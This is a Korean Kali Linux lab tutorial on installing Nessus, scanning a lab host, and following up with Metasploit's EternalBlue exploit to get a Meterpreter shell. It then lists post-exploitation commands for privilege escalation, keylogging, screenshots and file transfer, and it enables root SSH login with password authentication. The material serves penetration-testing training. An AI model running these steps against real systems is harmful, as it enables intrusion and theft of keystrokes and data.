[Kali Linux] Nessus 설치 및 실습 가이드

Nessus

Tenable에서 개발한 가장 널리 사용되는 포괄적인 네트워크 취약점 스캐너

 

---

1. Nessus 설치방법

공식 홈페이지에서 OS(Kali)에 맞는 설치 파일을 다운로드한 뒤 실습을 진행함.

 

https://www.tenable.com/downloads/nessus?loginAttempted=true

Download Tenable Nessus

 

 

 

① Kali Linux SSH 설정

Windows에서 다운로드한 설치 파일을 Kali로 전송하기 위해 SSH 설정을 수정함.

# SSH 설정 파일 수정
vi /etc/ssh/sshd_config

# 아래 라인 수정
33  PermitRootLogin yes
57  PasswordAuthentication yes

# 서비스 시작
systemctl start ssh

 

② 파일 전송 및 설치

Windows의 CMD 또는 PowerShell을 사용하여 파일을 Kali로 복사하고 설치를 완료함

 

 

Windows PowerShell:

# 설치 파일을 Kali의 /root/ 경로로 전송
scp Nessus-10.10.1-debian10_amd64.deb root@10.0.0.31:/root/

 

 

Kali Linux:

# 패키지 설치
dpkg -i Nessus-10.10.1-debian10_amd64.deb

# 서비스 시작 및 웹 접속 확인
# Firefox에서 https://10.0.0.31:8834/ 접속

참고: Nessus Essentials로 가입 후 메일로 받은 코드를 입력하여 실행함.

 

---

2. Nessus 사용법 및 결과 확인

 

① 스캔 설정

1) New Scan 클릭함.

 

2) Basic Network Scan 선택함.

 

3) Targets 항목에 진단 대상 IP(예: 10.0.0.41) 입력 후 저장함.

 

4) 목록에서 플레이(▶) 버튼을 눌러 스캔을 시작함.

 

② 결과 분석

• 스캔 완료 후 생성된 호스트를 클릭하여 발견된 취약점 목록을 확인함.
• 각 취약점을 클릭하면 상세 내용과 해결 방법(Remediation)을 볼 수 있음.

 

 

---

3. 실습 활용 (모의해킹 연계)

1) Nessus에서 탐지된 취약점(예: MS17-010)을 활용하여 실제 침투 테스트를 수행함.

MS17-010이라는 코드를 저장

 

kali 터미널

msfconsole
msf > search ms17-010

 

 

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options
msf exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.0.41
msf exploit(windows/smb/ms17_010_eternalblue) > set lhosts 10.0.0.31
msf exploit(windows/smb/ms17_010_eternalblue) > run
meterpreter >

 

meterpreter > 프롬프트가 떴다면 다음과 같은 작업을 수행할 수 있습니다.

• 시스템 정보 확인: sysinfo 명령어로 대상 OS 버전 등을 확인합니다.
• 파일 관리: upload, download 명령어로 파일을 주고받거나 ls로 폴더를 탐색합니다.
• 권한 상승: getsystem 명령어를 시도하여 관리자 권한을 획득하려 노력합니다.
• 정보 탈취: keyscan_start로 키보드 입력을 훔쳐보거나, screenshot으로 화면을 캡처합니다.